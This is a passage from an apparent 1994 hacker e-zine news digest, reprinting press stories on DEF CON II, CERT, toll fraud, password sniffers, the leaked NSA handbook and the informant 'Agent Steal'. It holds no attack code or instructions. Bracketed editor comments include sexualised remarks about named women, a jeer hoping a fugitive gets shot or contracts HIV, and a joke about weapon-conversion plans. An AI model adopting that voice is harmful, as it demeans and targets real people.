Producing viruses is very simple with the help of this program, but it is
|
|||
|
not easy to find. A clandestine Bulgarian data bank, as yet not identified,
|
|||
|
reportedly was behind all this. An international meeting of data processing
|
|||
|
virus "hunters" was organized in Amsterdam on 12 February to draft
|
|||
|
a strategy; an international police meeting on this subject will be held
|
|||
|
next week in Sweden.
|
|||
|
|
|||
|
Since 1991, the number of viruses in circulation throughout the world
|
|||
|
increased 500% to a total of about 10,000 viruses. In Italy, it is not
|
|||
|
forbidden to own a program of this type, but dissemination of viruses
|
|||
|
is prosecuted.
|
|||
|
|
|||
|
[So, I take it Nowhere Man cannot ever travel to Italy?]
|
|||
|
|
|||
|
--------------------------------------------------------------------------
|
|||
|
|
|||
|
DEFCON TV-News Coverage July 26, 1994
|
|||
|
by Hal Eisner (Real News at 10) (KCOP Channel 13 Los Angeles)
|
|||
|
|
|||
|
[Shot of audience]
|
|||
|
|
|||
|
Female Newscaster: "Hackers are like frontier outlaws. Look at what Hal
|
|||
|
Eisner found at a gathering of hackers on the Las
|
|||
|
Vegas strip."
|
|||
|
|
|||
|
[Shot of "Welcome to Vegas" sign]
|
|||
|
[Shot of Code Thief Deluxe v3.5]
|
|||
|
[Shot of Dark Tangent talking]
|
|||
|
|
|||
|
Dark Tangent: "Welcome to the convention!"
|
|||
|
|
|||
|
[Shot of Voyager hanging with some people]
|
|||
|
|
|||
|
Hal Eisner: "Well not everyone was welcome to this year's
|
|||
|
Def Con II, a national convention for hackers.
|
|||
|
Certainly federal agents weren't."
|
|||
|
|
|||
|
[Shot DTangent searching for a fed]
|
|||
|
|
|||
|
Dark Tangent: "On the right. Getting closer."
|
|||
|
|
|||
|
Fed: "Must be me! Thank you."
|
|||
|
|
|||
|
[Dark Tangent gives the Fed "I'm a Fed" t-shirt]
|
|||
|
|
|||
|
Hail Eisner: "Suspected agents were ridiculed and given
|
|||
|
identifying t-shirts. While conventioneers, some of
|
|||
|
[Shot of someone using a laptop]
|
|||
|
which have violated the law, and many of which are
|
|||
|
[Shot of some guy reading the DefCon pamphlet]
|
|||
|
simply tech-heads hungry for the latest theory, got
|
|||
|
[Shot of a frequency counter, and a scanner]
|
|||
|
to see a lot of the newest gadgetry, and hear some
|
|||
|
tough talk from an Arizona Deputy DA that
|
|||
|
[Shot of Gail giving her speech]
|
|||
|
specializes on computer crime and actually
|
|||
|
recognized some of her audience."
|
|||
|
|
|||
|
Gail: "Some people are outlaws, crooks, felons maybe."
|
|||
|
|
|||
|
[Shot back of conference room. People hanging]
|
|||
|
|
|||
|
Hal Eisner: "There was an Alice in Wonderland quality about all
|
|||
|
of this. Hackers by definition go where they are not
|
|||
|
invited, but so is the government that is trying to
|
|||
|
intrude on their privacy."
|
|||
|
|
|||
|
Devlin: "If I want to conceal something for whatever reason.
|
|||
|
I'd like to have the ability to."
|
|||
|
|
|||
|
Hal Eisner: "The bottom line is that many of the people here
|
|||
|
want to do what they want, when they want, and how
|
|||
|
they want, without restrictions."
|
|||
|
|
|||
|
Deadkat: "What we are doing is changing the system, and if you
|
|||
|
have to break the law to change the system, so be it!"
|
|||
|
|
|||
|
Hal Eisner: "That's from residents of that cyberspacious world
|
|||
|
[Shot of someone holding a diskette with what is supposed to be codez on the
|
|||
|
label]
|
|||
|
of behind the computer screen where the shy can be
|
|||
|
[Code Thief on the background]
|
|||
|
dangerous. Reporting from Las Vegas, Hal Eisner,
|
|||
|
Real News.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Cyber Cops May 23, 1994
|
|||
|
~~~~~~~~~~
|
|||
|
by Joseph Panettieri (Information Week) (Page 30)
|
|||
|
|
|||
|
When Chris Myers, a software engineer at Washington University in
|
|||
|
St. Louis, arrived to work one Monday morning last month, he realized
|
|||
|
something wasn't quite right. Files had been damaged and a back door
|
|||
|
was left ajar. Not in his office, but on the university's computer network.
|
|||
|
|
|||
|
Like Commissioner Gordon racing to the Batphone, Myers swiftly called the
|
|||
|
Internet's guardian, the Computer Emergency Response Team (CERT).
|
|||
|
|
|||
|
The CERT team boasts impressive credentials. Its 14 team members are
|
|||
|
managed by Dain Gary, former director of corporate data security at
|
|||
|
Mellon Bank Corp. in Pittsburgh. While Gary is the coach of the CERT
|
|||
|
squad, Moira West is the scrambling on-field quarterback. As manager
|
|||
|
of CERT's incident-response team and coordination center, she oversees
|
|||
|
the team's responses to attacks by Internet hackers and its search for
|
|||
|
ways to reduce the Internet's vulnerabilities. West was formerly a
|
|||
|
software engineer at the University of York in England.
|
|||
|
|
|||
|
The rest of the CERT team remains in the shadows. West says
|
|||
|
the CERT crew hails from various information-systems backgrounds,
|
|||
|
but declines to get more specific, possibly to hide any Achilles'
|
|||
|
heels from hackers.
|
|||
|
|
|||
|
One thing West stresses is that CERT isn't a collection of reformed
|
|||
|
hackers combing the Internet for suspicious data. "People have to
|
|||
|
trust us, so hiring hackers definitely isn't an option," she says.
|
|||
|
"And we don't probe or log-on to other people's systems."
|
|||
|
|
|||
|
As a rule, CERT won't post an alert until after it finds a
|
|||
|
remedy to the problem. But that can take months, giving hackers
|
|||
|
time to attempt similar breakins on thousands of Internet hosts
|
|||
|
without fear of detection. Yet CERT's West defends this policy:
|
|||
|
"We don't want to cause mass hysteria if there's no way to
|
|||
|
address a new, isolated problem. We also don't want to alert the
|
|||
|
entire intruder community about it."
|
|||
|
|
|||
|
------------------------------------
|
|||
|
Who You Gonna Call?
|
|||
|
How to reach CERT
|
|||
|
|
|||
|
Phone: 412-268-7090
|
|||
|
Internet: cert@cert.org
|
|||
|
Fax: 412-268-6989
|
|||
|
Mail: CERT Coordination Center
|
|||
|
Software Engineering Institute
|
|||
|
Carnegie Mellon University
|
|||
|
Pittsburgh, PA 15213-3890
|
|||
|
------------------------------------
|
|||
|
|
|||
|
[Ask for that saucy British chippie. Her voice will melt you like
|
|||
|
butter.
|
|||
|
|
|||
|
CERT -- Continually re-emphasizing the adage: "You get what you pay for!"]
|
|||
|
|
|||
|
And remember, CERT doesn't hire hackers, they just suck the juicy bits
|
|||
|
out of their brains for free.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Defining the Ethics of Hacking August 12, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Amy Harmon (Los Angeles Times) (page A1)
|
|||
|
|
|||
|
Eric Corley, a.k.a Emmanuel Goldstein -- patron saint of computer
|
|||
|
hackers and phone phreaks -- is having a party.
|
|||
|
|
|||
|
And perhaps it is just in time. 2600, the hacker magazine Corley
|
|||
|
started when he was 23, is a decade old. It has spawned monthly
|
|||
|
hacker meetings in dozens of cities. It has been the target of a
|
|||
|
Secret Service investigation. It has even gone aboveground, with
|
|||
|
newsstand sales of 20,000 last year.
|
|||
|
|
|||
|
As hundreds of hackers converge in New York City this weekend to celebrate
|
|||
|
2600's anniversary, Corley hopes to grapple with how to uphold the
|
|||
|
"hacker ethic," an oxymoron to some, in an era when many of 2600's devotees
|
|||
|
just want to know how to make free phone calls. (Less high-minded
|
|||
|
activities -- like cracking the New York City subway's new electronic
|
|||
|
fare card system -- are also on the agenda).
|
|||
|
|
|||
|
Hackers counter that in a society increasingly dependent on
|
|||
|
technology, the very basis for democracy could be threatened by limiting
|
|||
|
technological exploration. "Hacking teaches people to think critically about
|
|||
|
technology," says Rop Gonggrijp, a Dutch hacker who will attend the Hackers
|
|||
|
on Planet Earth conference this weekend. "The corporations that are building
|
|||
|
the technology are certainly not going to tell us, because they're trying to
|
|||
|
sell it to us. Whole societies are trusting technology blindly -- they just
|
|||
|
believe what the technocrats say."
|
|||
|
|
|||
|
Gonggrijp, 26, publishes a magazine much like 2600 called Hack-Tic,
|
|||
|
which made waves this year with an article showing that while tapping mobile
|
|||
|
phones of criminal suspects with radio scanners, Dutch police tapped into
|
|||
|
thousand of other mobile phones.
|
|||
|
|
|||
|
"What society needs is people who are independent yet knowledgeable,"
|
|||
|
Gonggrijp said. 'That's mostly going to be young people, which society is
|
|||
|
uncomfortable with. But there's only two groups who know how the phone and
|
|||
|
computer systems work, and that's engineers and hackers. And I think that's
|
|||
|
a very healthy situation."
|
|||
|
|
|||
|
[By the way Amy: Phrack always grants interviews to cute, female
|
|||
|
LA Times reporters.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Fighting Telephone Fraud August 1, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Barbara DePompa (Information Week) (Page 74)
|
|||
|
|
|||
|
Local phone companies are taking an active role in warning customers of
|
|||
|
scams and cracking down on hackers.
|
|||
|
|
|||
|
Early last month, a 17-year old hacker in Baltimore was caught
|
|||
|
red-handed with a list of more than 100 corporate authorization codes that
|
|||
|
would have enabled fraud artists to access private branch exchanges and
|
|||
|
make outgoing calls at corporate expanse.
|
|||
|
|
|||
|
After the teenager's arrest, local police shared the list with Bell
|
|||
|
Atlantic's fraud prevention group. Within hours, the phone numbers were
|
|||
|
communicated to the appropriate regional phone companies and corporate
|
|||
|
customers on the list were advised to either change their authorization
|
|||
|
codes or shut down outside dialing privileges.
|
|||
|
|
|||
|
"We can't curb fraud without full disclosure and sharing this type
|
|||
|
of vital information" points out Mary Chacanias, manager of
|
|||
|
telecommunications fraud prevention for Bell Atlantic in Arlington, VA.
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
AT&T Forms Team to Track Hackers August 30, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
(Reuters News Wire)
|
|||
|
|
|||
|
AT&T Corp.'s Global Business Communications Systems subsidiary said
|
|||
|
Wednesday it has formed an investigative unit to monitor, track and
|
|||
|
catch phone-system hackers in the act of committing toll fraud.
|
|||
|
|
|||
|
The unit will profile hacker activity and initiate "electronic
|
|||
|
stakeouts" with its business communications equipment in cooperation
|
|||
|
with law enforcement agencies, and work with them to prosecute the
|
|||
|
thieves.
|
|||
|
|
|||
|
"We're in a shoot-out between 'high-tech cops' -- like AT&T -- and
|
|||
|
'high-tech robbers' who brazenly steal long distance service from our
|
|||
|
business customers," said Kevin Hanley, marketing director for business
|
|||
|
security systems for AT&T Global Business.
|
|||
|
|
|||
|
"Our goal is not only to defend against hackers but to get them off the
|
|||
|
street."
|
|||
|
|
|||
|
[Oh my God. Are you scared? Have you wet yourself? YOU WILL!]
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
Former FBI Informant a Fugitive July 31, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Keith Stone (Daily News)
|
|||
|
|
|||
|
Computer outlaw Justin Tanner Petersen and prosecutors
|
|||
|
cut a deal: The Los Angeles nightclub promoter known in
|
|||
|
the computer world as "Agent Steal" would work for the
|
|||
|
government in exchange for freedom.
|
|||
|
|
|||
|
With his help, the government built its case against
|
|||
|
Kevin Lee Poulsen, a Pasadena native who pleaded guilty
|
|||
|
in June to charges he electronically rigged telephones at
|
|||
|
Los Angeles radio stations so he could win two Porsches,
|
|||
|
$22,000 and two trips to Hawaii.
|
|||
|
|
|||
|
Petersen also provided information on Kevin Mitnick, a
|
|||
|
Calabasas man wanted by the FBI for cracking computer and
|
|||
|
telephone networks at Pacific Bell and the state Department
|
|||
|
of Motor Vehicles, according to court records.
|
|||
|
|
|||
|
Petersen's deal lasted for nearly two years - until
|
|||
|
authorities found that while he was helping them undercover,
|
|||
|
he also was helping himself to other people's credit cards.
|
|||
|
|
|||
|
Caught but not cornered, the 34-year-old "Agent Steal" had
|
|||
|
one more trick: He admitted his wrongdoing to a prosecutor
|
|||
|
at the Los Angeles U.S. Attorney's Office, asked to meet
|
|||
|
with his attorney and then said he needed to take a walk.
|
|||
|
|
|||
|
And he never came back.
|
|||
|
|
|||
|
A month after Petersen fled, he spoke with a magazine for
|
|||
|
computer users about his role as an FBI informant, who he
|
|||
|
had worked against and his plans for the future.
|
|||
|
|
|||
|
"I have learned a lot about how the bureau works. Probably
|
|||
|
too much," he said in an interview that Phrack Magazine published
|
|||
|
Nov. 17, 1993. Phrack is available on the Internet, a worldwide
|
|||
|
network for computer users.
|
|||
|
|
|||
|
Petersen told the magazine that working with the FBI was fun
|
|||
|
most of the time. "There was a lot of money and resources used.
|
|||
|
In addition, they paid me well," he said.
|
|||
|
|
|||
|
"If I didn't cooperate with the bureau," he told Phrack, "I
|
|||
|
could have been charged with possession of government material."
|
|||
|
|
|||
|
"Most hackers would have sold out their mother," he added.
|
|||
|
|
|||
|
Petersen is described as 5 foot, 11 inches, 175 pounds, with
|
|||
|
brown hair - "sometimes platinum blond." But his most telling
|
|||
|
characteristic is that he walks with the aid of a prosthesis
|
|||
|
because he lost his left leg below the knee in a car accident.
|
|||
|
|
|||
|
Heavily involved in the Hollywood music scene, Petersen's
|
|||
|
last known employer was Club "Velvet Jam," one of a string of
|
|||
|
clubs he promoted in Los Angeles.
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
Hacker in Hiding July 31, 1994
|
|||
|
~~~~~~~~~~~~~~~~
|
|||
|
by John Johnson (LA Times)
|
|||
|
|
|||
|
First there was the Condor, then Dark Dante. The latest computer hacker to
|
|||
|
hit the cyberspace most wanted list is Agent Steal, a slender, good-looking
|
|||
|
rogue partial to Porsches and BMWs who bragged that he worked undercover
|
|||
|
for the FBI catching other hackers.
|
|||
|
|
|||
|
Now Agent Steal, whose real name is Justin Tanner Petersen, is on the run
|
|||
|
from the very agency he told friends was paying his rent and flying him to
|
|||
|
computer conferences to spy on other hackers.
|
|||
|
|
|||
|
Petersen, 34, disappeared Oct. 18 after admitting to federal prosecutors
|
|||
|
that he had been committing further crimes during the time when he was
|
|||
|
apparently working with the government "in the investigation of other
|
|||
|
persons," according to federal court records.
|
|||
|
|
|||
|
Ironically, by running he has consigned himself to the same secretive life
|
|||
|
as Kevin Mitnick, the former North Hills man who is one of the nation's most
|
|||
|
infamous hackers, and whom Petersen allegedly bragged of helping to set up
|
|||
|
for an FBI bust. Mitnick, who once took the name Condor in homage to a
|
|||
|
favorite movie character, has been hiding for almost two years to avoid
|
|||
|
prosecution for allegedly hacking into computers illegally and posing as a
|
|||
|
law enforcement officer.
|
|||
|
|
|||
|
Authorities say Petersen's list of hacks includes breaking into computers
|
|||
|
used by federal investigative agencies and tapping into a credit card
|
|||
|
information bureau. Petersen, who once promoted after-hours rock shows in
|
|||
|
the San Fernando Valley, also was involved in the hacker underground's most
|
|||
|
sensational scam - hijacking radio station phone lines to win contests with
|
|||
|
prizes ranging from new cars to trips to Hawaii.
|
|||
|
|
|||
|
Petersen gave an interview last year to an on-line publication called Phrack
|
|||
|
in which he claimed to have tapped the phone of a prostitute working for
|
|||
|
Heidi Fleiss. He also boasted openly of working with the FBI to bust
|
|||
|
Mitnick.
|
|||
|
|
|||
|
"When I went to work for the bureau I contacted him," Petersen said in the
|
|||
|
interview conducted by Mike Bowen. "He was still up to his old tricks, so
|
|||
|
we opened a case on him. . . . What a loser. Everyone thinks he is some
|
|||
|
great hacker. I outsmarted him and busted him."
|
|||
|
|
|||
|
In the Phrack interview, published on the Internet, an international network
|
|||
|
of computer networks with millions of users, Agent Steal bragged about
|
|||
|
breaking into Pacific Bell headquarters with Poulsen to obtain information
|
|||
|
about the phone company's investigation of his hacking.
|
|||
|
|
|||
|
Petersen was arrested in Texas in 1991, where he lived briefly. Court
|
|||
|
records show that authorities searching his apartment found computer
|
|||
|
equipment, Pacific Bell manuals and five modems.
|
|||
|
|
|||
|
A grand jury in Texas returned an eight-count indictment against Petersen,
|
|||
|
accusing him of assuming false names, accessing a computer without
|
|||
|
authorization, possessing stolen mail and fraudulently obtaining and using
|
|||
|
credit cards.
|
|||
|
|
|||
|
The case was later transferred to California and sealed, out of concern for
|
|||
|
Petersen's safety, authorities said. The motion to seal, obtained by
|
|||
|
Sherman, states that Petersen, "acting in an undercover capacity, currently
|
|||
|
is cooperating with the United States in the investigation of other persons
|
|||
|
in California."
|
|||
|
|
|||
|
In the Phrack interview, Petersen makes no apologies for his choices in life.
|
|||
|
|
|||
|
While discussing Petersen's role as an informant, Mike Bowen says, "I think
|
|||
|
that most hackers would have done the same as you."
|
|||
|
|
|||
|
"Most hackers would have sold out their mother," Petersen responded.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Computer Criminal Caught After 10 Months on the Run August 30, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Keith Stone (Daily News)
|
|||
|
|
|||
|
Convicted computer criminal Justin Tanner Petersen was captured Monday in
|
|||
|
Los Angeles, 10 months after federal authorities said they discovered he
|
|||
|
had begun living a dual life as their informant and an outlaw hacker.
|
|||
|
|
|||
|
Petersen, 34, was arrested about 3:30 a.m. outside a Westwood apartment
|
|||
|
that FBI agents had placed under surveillance, said Assistant U.S.
|
|||
|
Attorney David Schindler.
|
|||
|
|
|||
|
A flamboyant hacker known in the computer world as "Agent Steal," Petersen
|
|||
|
was being held without bail in the federal detention center in Los Angeles.
|
|||
|
U.S. District Court Judge Stephen V. Wilson scheduled a sentencing hearing
|
|||
|
for Oct. 31.
|
|||
|
|
|||
|
Petersen faces a maximum of 40 years in prison for using his sophisticated
|
|||
|
computer skills to rig a radio contest in Los Angeles, tap telephone lines
|
|||
|
and enrich himself with credit cards.
|
|||
|
|
|||
|
Monday's arrest ends Petersen's run from the same FBI agents with whom he
|
|||
|
had once struck a deal: to remain free on bond in exchange for pleading
|
|||
|
guilty to several computer crimes and helping the FBI with other hacker
|
|||
|
cases.
|
|||
|
|
|||
|
The one-time nightclub promoter pleaded guilty in April 1993 to six federal
|
|||
|
charges. And he agreed to help the government build its case against Kevin
|
|||
|
Lee Poulsen, who was convicted of manipulating telephones to win radio
|
|||
|
contests and is awaiting trial on espionage charges in San Francisco.
|
|||
|
|
|||
|
Authorities said they later learned that Petersen had violated the deal by
|
|||
|
committing new crimes even as he was awaiting sentencing in the plea
|
|||
|
agreement.
|
|||
|
|
|||
|
On Monday, FBI agents acting on a tip were waiting for Petersen when he parked
|
|||
|
a BMW at the Westwood apartment building. An FBI agent called Petersen's
|
|||
|
name, and Petersen began to run, Schindler said.
|
|||
|
|
|||
|
Two FBI agents gave chase and quickly caught Petersen, who has a prosthetic
|
|||
|
lower left leg because of a car-motorcycle accident several years ago.
|
|||
|
|
|||
|
In April 1993, Petersen pleaded guilty to six federal charges including
|
|||
|
conspiracy, computer fraud, intercepting wire communications, transporting
|
|||
|
a stolen vehicle across state lines and wrongfully accessing TRW credit
|
|||
|
files. Among the crimes that Petersen has admitted to was working with other
|
|||
|
people to seize control of telephone lines so they could win radio
|
|||
|
promotional contests. In 1989, Petersen used that trick and walked away with
|
|||
|
$10,000 in prize money from an FM station, court records show.
|
|||
|
|
|||
|
When that and other misdeeds began to catch up with him, Petersen said, he
|
|||
|
fled to Dallas, where he assumed the alias Samuel Grossman and continued
|
|||
|
using computers to make money illegally.
|
|||
|
|
|||
|
When he as finally arrested in 1991, Petersen played his last card.
|
|||
|
"I called up the FBI and said: 'Guess what? I am in jail,' " he said.
|
|||
|
He said he spent the next four months in prison, negotiating for his freedom
|
|||
|
with the promise that he would act as an informant in Los Angeles.
|
|||
|
|
|||
|
The FBI paid his rent and utilities and gave him $200 a week for spending
|
|||
|
money and medical insurance, Petersen said.
|
|||
|
|
|||
|
They also provided him with a computer and phone lines to gather information
|
|||
|
on hackers, he said.
|
|||
|
|
|||
|
Eventually, Petersen said, the FBI stopped supporting him so he turned to
|
|||
|
his nightclubs for income. But when that began to fail, he returned to
|
|||
|
hacking for profit.
|
|||
|
|
|||
|
"I was stuck out on a limb. I was almost out on the street. My club
|
|||
|
was costing me money because it was a new club," he said. "So I did what
|
|||
|
I had to do. I an not a greedy person."
|
|||
|
|
|||
|
[Broke, Busted, Distrusted. Turning in your friends leads to some
|
|||
|
seriously bad Karma, man. Negative energy like that returns ten-fold.
|
|||
|
You never know in what form either. You could end getting shot,
|
|||
|
thrown in jail, or worse, test HIV Positive. So many titty-dancers,
|
|||
|
so little time, eh dude? Good luck and God bless ya' Justin.]
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
Fugitive Hacker Baffles FBI With Technical Guile July 5, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by John Markoff (New York Times)
|
|||
|
|
|||
|
[Mitnik, Mitnik, Mitnik, and more Mitnik. Poor bastard. No rest for
|
|||
|
the wicked, eh Kevin?]
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
Computer Outlaws Invade the Internet May 24, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Mike Toner (Atlanta Journal-Constitution)
|
|||
|
|
|||
|
A nationwide wave of computer break-ins has law enforcement
|
|||
|
authorities scrambling to track down a sophisticated ring of
|
|||
|
"hackers" who have used the international "information
|
|||
|
highway," the Internet, to steal more than 100,000 passwords -- the
|
|||
|
electronic keys to vast quantities of information stored on
|
|||
|
government, university and corporate computer systems.
|
|||
|
|
|||
|
Since the discovery of an isolated break-in last year at a
|
|||
|
single computer that provides a "gateway" to the Internet,
|
|||
|
operators of at least 30 major computer systems have found illicit
|
|||
|
password "sniffers" on their machines.
|
|||
|
|
|||
|
The Federal Bureau of Investigation has been investigating the
|
|||
|
so-called "sniffer" attacks since February, but security experts
|
|||
|
say the intrusions are continuing -- spurred, in part, by the
|
|||
|
publication last month of line-by-line instructions for the
|
|||
|
offending software in an on-line magazine for hackers.
|
|||
|
|
|||
|
Computer security experts say the recent rash of password piracy
|
|||
|
using the Internet is much more serious than earlier security
|
|||
|
violations, like the electronic "worm" unleashed in 1988 by
|
|||
|
Cornell University graduate student Robert Morris.
|
|||
|
|
|||
|
"This is a major concern for the whole country," she says.
|
|||
|
"I've had some sleepless nights just thinking about what could
|
|||
|
happen. It's scary. Once someone has your ID and your password,
|
|||
|
they can read everything you own, erase it or shut a system down.
|
|||
|
They can steal proprietary information and sell it, and you might
|
|||
|
not even know it's gone."
|
|||
|
|
|||
|
"Society has shifted in the last few years from just using
|
|||
|
computers in business to being absolutely dependent on them and the
|
|||
|
information they give us -- and the bad guys are beginning to
|
|||
|
appreciate the value of information," says Dain Gary, manager of
|
|||
|
the Computer Emergency Response Team (CERT), a crack team of
|
|||
|
software experts at Carnegie-Mellon University in Pittsburgh that
|
|||
|
is supported by the Defense Department's Advanced Research Projects
|
|||
|
Agency.
|
|||
|
|
|||
|
Gary says the current rash of Internet crime appears to be the
|
|||
|
work of a "loosely knit but fairly organized group" of computer
|
|||
|
hackers adept not only at breaking and entering, but at hiding
|
|||
|
their presence once they're in.
|
|||
|
|
|||
|
Most of the recent break-ins follow a similar pattern. The
|
|||
|
intruders gain access to a computer system by locating a weakness
|
|||
|
in its security system -- what software experts call an "unpatched
|
|||
|
vulnerability."
|
|||
|
|
|||
|
Once inside, the intruders install a network monitoring program,
|
|||
|
a "sniffer," that captures and stores the first 128 keystrokes
|
|||
|
of all newly opened accounts, which almost always includes a user's
|
|||
|
log-on and password.
|
|||
|
|
|||
|
"We really got concerned when we discovered that the code had
|
|||
|
been published in Phrack, an on-line magazine for hackers, on April
|
|||
|
1," he says. "Putting something like that in Phrack is a little
|
|||
|
like publishing the instructions for converting semiautomatic
|
|||
|
weapons into automatics.
|
|||
|
|
|||
|
Even more disturbing to security experts is the absence of a
|
|||
|
foolproof defense. CERT has been working with computer system
|
|||
|
administrators around the country to shore up electronic security,
|
|||
|
but the team concedes that such "patches" are far from perfect.
|
|||
|
|
|||
|
[Look for plans on converting semiautomatic weapons into automatics
|
|||
|
in the next issue.]
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Information Superhighwaymen - Hacker Menace Persists May 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
(Open Computing) (Page 25)
|
|||
|
|
|||
|
Once again the Internet has been labeled a security problem. And a new
|
|||
|
breed of hackers has attracted attention for breaking into systems.
|
|||
|
"This is a group of people copying what has been done for years," says
|
|||
|
Chris Goggans, aka Erik Bloodaxe. "There's one difference: They don't
|
|||
|
play nice."
|
|||
|
|
|||
|
Goggans was a member of the hacker gang called the Legion of Doom in the
|
|||
|
late '80s to early '90s. Goggans says the new hacking group, which goes
|
|||
|
by the name of "The Posse," has broken into numerous Business Week 1000
|
|||
|
companies including Sun Microsystems Inc., Boeing, and Xerox. He says
|
|||
|
they've logged onto hundreds of universities and online services like
|
|||
|
The Well. And they're getting root access on all these systems.
|
|||
|
|
|||
|
For their part, The Posse--a loose band of hackers--isn't talking.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Security Experts: Computer Hackers a Growing Concern July 22, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
New York Times News Wire (Virginian-Pilot and Ledger Star) (2A)
|
|||
|
|
|||
|
Armed with increasing sophisticated snooping tools, computer programmers
|
|||
|
operating both in the United States and abroad have gained unauthorized
|
|||
|
access to hundreds of sensitive but unclassified government and military
|
|||
|
computer networks called Internet, computer security experts said.
|
|||
|
|
|||
|
Classified government and military data, such as those that control
|
|||
|
nuclear weapons, intelligence and other critical functions, are not
|
|||
|
connected to the Internet and are believed to be safe from the types of
|
|||
|
attacks reported recently.
|
|||
|
|
|||
|
The apparent ease with which hackers are entering military and government
|
|||
|
systems suggests that similar if not greater intrusions are under way on
|
|||
|
corporate, academic and commercial networks connected to the Internet.
|
|||
|
|
|||
|
Several sources said it was likely that only a small percentage of
|
|||
|
intrusions, perhaps fewer than 5 percent, have been detected.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
NSA Semi-confidential Rules Circulate
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
By Keay Davidson (San Francisco Examiner) (Page A1)
|
|||
|
|
|||
|
It arrived mysteriously at an Austin, Texas, post office box by "snail
|
|||
|
mail" - computerese for the Postal Service. But once the National Security
|
|||
|
Agency's employee handbook was translated into bits and bytes, it took
|
|||
|
only minutes to circulate across the country.
|
|||
|
|
|||
|
Thus did a computer hacker in Texas display his disdain for government
|
|||
|
secrecy last week - by feeding into public computer networks the
|
|||
|
semiconfidential document, which describes an agency that, during the darkest
|
|||
|
days of the Cold War, didn't officially "exist."
|
|||
|
|
|||
|
Now, anyone with a computer, telephone, modem and basic computer skills
|
|||
|
can read the 36-page manual, which is stamped "FOR OFFICIAL USE ONLY" and
|
|||
|
offers a glimpse of the shadowy world of U.S. intelligence - and the personal
|
|||
|
price its inhabitants pay.
|
|||
|
|
|||
|
"Your home, car pool, and public places are not authorized areas to
|
|||
|
conduct classified discussions - even if everyone involved in the discussion
|
|||
|
possesses a proper clearance and "need-to-know.' The possibility that a
|
|||
|
conversation could be overheard by unauthorized persons dictates the need to
|
|||
|
guard against classified discussions in non-secure areas."
|
|||
|
|
|||
|
The manual is "so anal retentive and paranoid. This gives you some
|
|||
|
insight into how they think," said Chris Goggans, the Austin hacker who
|
|||
|
unleashed it on the computer world. His on-line nom de plume is "Erik
|
|||
|
Bloodaxe" because "when I was about 11, I read a book on Vikings, and that
|
|||
|
name really struck me."
|
|||
|
|
|||
|
NSA spokeswoman Judi Emmel said Tuesday that "apparently this document is
|
|||
|
an (NSA) employee handbook, and it is not classified." Rather, it is an
|
|||
|
official NSA employee manual and falls into a twilight zone of secrecy. On
|
|||
|
one hand, it's "unclassified." On the other hand, it's "FOR OFFICIAL USE
|
|||
|
ONLY" and can be obtained only by filing a formal request under the U.S.
|
|||
|
Freedom of Information Act, Emmel said.
|
|||
|
|
|||
|
"While you may take this handbook home for further study, remember that
|
|||
|
it does contain "FOR OFFICIAL USE ONLY' information which should be
|
|||
|
protected," the manual warns. Unauthorized release of such information could
|
|||
|
result in "appropriate administrative action ... (and) corrective and/or
|
|||
|
disciplinary measures."
|
|||
|
|
|||
|
Goggans, 25, runs an on-line electronic "magazine" for computer hackers
|
|||
|
called Phrack, which caters to what he calls the "computer underground." He
|
|||
|
is also a computer engineer at an Austin firm, which he refuses to name.
|
|||
|
|
|||
|
The manual recently arrived at Goggans' post office box in a white
|
|||
|
envelope with no return address, save a postmark from a Silicon Valley
|
|||
|
location, he says. Convinced it was authentic, he typed it into his computer,
|
|||
|
then copied it into the latest issue of Phrack.
|
|||
|
|
|||
|
Other hackers, like Grady Ward of Arcata, Humboldt County, and Jeff
|
|||
|
Leroy Davis of Laramie, Wyo., redistributed the electronic files to computer
|
|||
|
users' groups. These included one run by the Cambridge, Mass.-based
|
|||
|
Electronic Frontier Foundation, which fights to protect free speech on
|
|||
|
computer networks.
|
|||
|
|
|||
|
Ward said he helped redistribute the NSA manual "to embarrass the NSA"
|
|||
|
and prove that even the U.S. government's most covert agency can't keep
|
|||
|
documents secret.
|
|||
|
|
|||
|
The action also was aimed at undermining a federal push for
|
|||
|
data-encryption regulations that would let the government tap into computer
|
|||
|
networks, Ward said.
|
|||
|
|
|||
|
[Yeah...sure it was, Grady.]
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Hackers Stored Pornography in Computers at Weapons Lab July 13, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Adam S. Bauman (Virginian-Pilot and Ledger-Star) (Page A6)
|
|||
|
|
